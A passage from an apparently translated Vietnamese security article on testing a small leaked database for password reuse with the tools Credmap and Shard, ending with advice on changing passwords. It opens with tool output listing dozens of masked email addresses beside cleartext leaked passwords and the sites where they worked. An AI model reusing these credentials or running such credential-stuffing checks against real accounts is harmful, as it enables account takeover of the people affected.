[+] *******@hotmail.com:ikbengek1 - Twitter, BitBucket
[+] *******@allansmith.net:ras04cal - Twitter
[+] *******@419.e90.biz:b82olSn4yH - BitBucket
[+] *******@hotmail.com:tototomy - Twitter
[+] *******@gmail.com:2211 - BitBucket
[+] *******@qq.com:1391730 - Twitter
[+] *******@gmail.com:robby123 - BitBucket
[+] *******@gmail.com:Logitech123 - BitBucket
[+] *******@yahoo.com:darkstar3509 - BitBucket
[+] *******@gmail.com:whodey - BitBucket
[+] *******@uhd.net.ua:h55gr5sKdQ - BitBucket
[+] *******@gmail.com:roblox12 - BitBucket
[+] *******@gmail.com:12345Brandon - BitBucket
[+] *******@gmail.com:Banan123 - BitBucket
[+] *******@gmail.com:joshuavi - Kijiji
[+] *******@cox.net:damnkids - BitBucket
[+] *******@hotmail.com:1kolort2 - BitBucket
[+] *******@live.com:roblox12 - Twitter, BitBucket
[+] *******@gmail.com:azerty00 - Twitter
[+] *******@gmail.com:apache7076 - Twitter
[+] *******@inmyd.ru:2wbJx11zaW - BitBucket
[+] *******@aim.com:thisisme - BitBucket
[+] *******@gmail.com:dacheng198 - BitBucket
[+] *******@GMAIL.COM:BASSETT92 - BitBucket
[+] *******@gmail.com:123456 - BitBucket
[+] *******@hotmail.com:syndrom02 - Twitter, BitBucket
[+] *******@gmail.com:bronco999 - BitBucket
[+] *******@hotmail.com:metallica4224 - Twitter
[+] *******@gmail.com:rawtheme22 - Twitter
[+] *******@gmail.com:sobaked123 - BitBucket
[+] *******@gmail.com:Thee1234 - BitBucket
[+] *******@hotmail.ca:0230176 - BitBucket
[+] *******@gmail.com:19722791 - BitBucket
[+] *******@gmail.com:indonesia2016 - BitBucket
[+] *******@live.co.uk:01cs653 - Facebook, BitBucket
[+] *******@gmail.com:Battlefield710 - Twitter, BitBucket
[+] *******@gmail.com:Supaman1 - Facebook
[+] *******@hotmail.com:Bigdick*12 - BitBucket
[+] *******@outlook.com:darkstar1 - BitBucket
[+] *******@web.de:gt9800 - BitBucket
[+] *******@yahoo.com:mvp123 - Twitter
[+] *******@yahoo.com:arturi09 - BitBucket
[+] *******@gmail.com:092486 - BitBucket
[+] *******@hotmail.com:sappeps12345 - BitBucket
[+] *******@yahoo.com:1morerep - Twitter, BitBucket
[+] *******@cox.net:joiedevivre - BitBucket
[+] *******@gmail.com:23vec4rPcC - BitBucket
Sau khi chạy lệnh Shard, tổng cộng có 219 tài khoản Twitter, Facebook, BitBucket và Kijiji đã được báo cáo là sử dụng cùng tên người dùng: kết hợp mật khẩu. Thật thú vị, không có phát hiện Reddit lần này.
Kết quả của Shard xác định rằng 166 tài khoản BitBucket đã bị xâm phạm khi sử dụng cuộc tấn công tái sử dụng mật khẩu này, không phù hợp với việc phát hiện 111 tài khoản BitBucket của Credmap. Cả Crepmap và Shard đều chưa được cập nhật từ năm 2016 và tôi nghi ngờ kết quả của BitBucket chủ yếu là (nếu không hoàn toàn) là dương tính giả. Có thể BitBucket đã thay đổi các tham số đăng nhập của họ kể từ năm 2016 và đã loại bỏ khả năng của Credmap và Shard để phát hiện nỗ lực đăng nhập đã được xác minh.
Tin tặc có động lực có thể bẻ khóa nhiều mật khẩu hơn
Tổng cộng (bỏ qua dữ liệu BitBucket), các tài khoản bị xâm nhập bao gồm 61 từ Twitter, 52 từ Reddit, 17 từ Facebook, 29 từ Scribd, 23 từ Microsoft và một số ít từ Foursquare, Wunderlist và Kijiji. Khoảng 200 tài khoản trực tuyến bị xâm phạm do vi phạm dữ liệu nhỏ trong năm 2017.
Và hãy nhớ, cả Credmap và Shard đều không kiểm tra việc sử dụng lại mật khẩu đối với Gmail, Netflix, iCloud, trang web ngân hàng hoặc các trang web nhỏ hơn có thể chứa thông tin cá nhân như BestBuy , Macy và các công ty hàng không.
Nếu các bản phát hiện Credmap và Shard được cập nhật và nếu tôi dành nhiều thời gian hơn để bẻ khóa 57% số băm còn lại, kết quả sẽ cao hơn. Với rất ít nỗ lực và thời gian, kẻ tấn công có khả năng xâm phạm hàng trăm tài khoản trực tuyến chỉ bằng một vi phạm dữ liệu nhỏ bao gồm 1.100 địa chỉ email và mật khẩu băm.
Một kẻ tấn công có động lực với 8 triệu hoặc 26 triệu bộ dữ liệu duy nhất sẽ có thể gây ra sự hủy diệt lớn trên hàng ngàn tài khoản trực tuyến.
Đừng bỏ qua vi phạm dữ liệu …
Nếu bạn không muốn tên người dùng và mật khẩu của mình hiển thị trong bất kỳ cơ sở dữ liệu bị rò rỉ nào, có một vài điều rõ ràng bạn có thể làm:
- Thay đổi mật khẩu của bạn. Ngay bây giờ. Và làm cho họ khó khăn và mất nhiều thời gian hơn . Sử dụng trình quản lý mật khẩu phù hợp như KeePassX hoặc LastPass để lưu trữ tất cả dữ liệu nhạy cảm của bạn. Hãy dành một buổi chiều và đặt lại tất cả mật khẩu của bạn, ngay cả những tài khoản chơi game nhỏ mà bạn quên bạn đã đăng ký.
- Hãy chú ý . Theo kịp với các vi phạm dữ liệu khi chúng xảy ra. Có rất nhiều cửa hàng tin tức uy tín cung cấp tin tức liên quan đến tin tặc khi nó xảy ra.
- Phản ứng . Khi vi phạm dữ liệu xảy ra, đừng bỏ qua chúng. Nếu bạn đã từng được liên kết với trang web bị ảnh hưởng bởi vi phạm, hãy thay đổi mật khẩu của bạn ngay lập tức. Nếu bạn không sử dụng tài khoản nữa hoặc không thực sự cần nó, hãy xóa nó. Đừng nghĩ rằng một trang web quá nhỏ để bị xâm phạm. Một hacker có thể dễ dàng xoay vòng từ một tài khoản nhỏ đến địa chỉ email chính của bạn. Điều đó là có thể.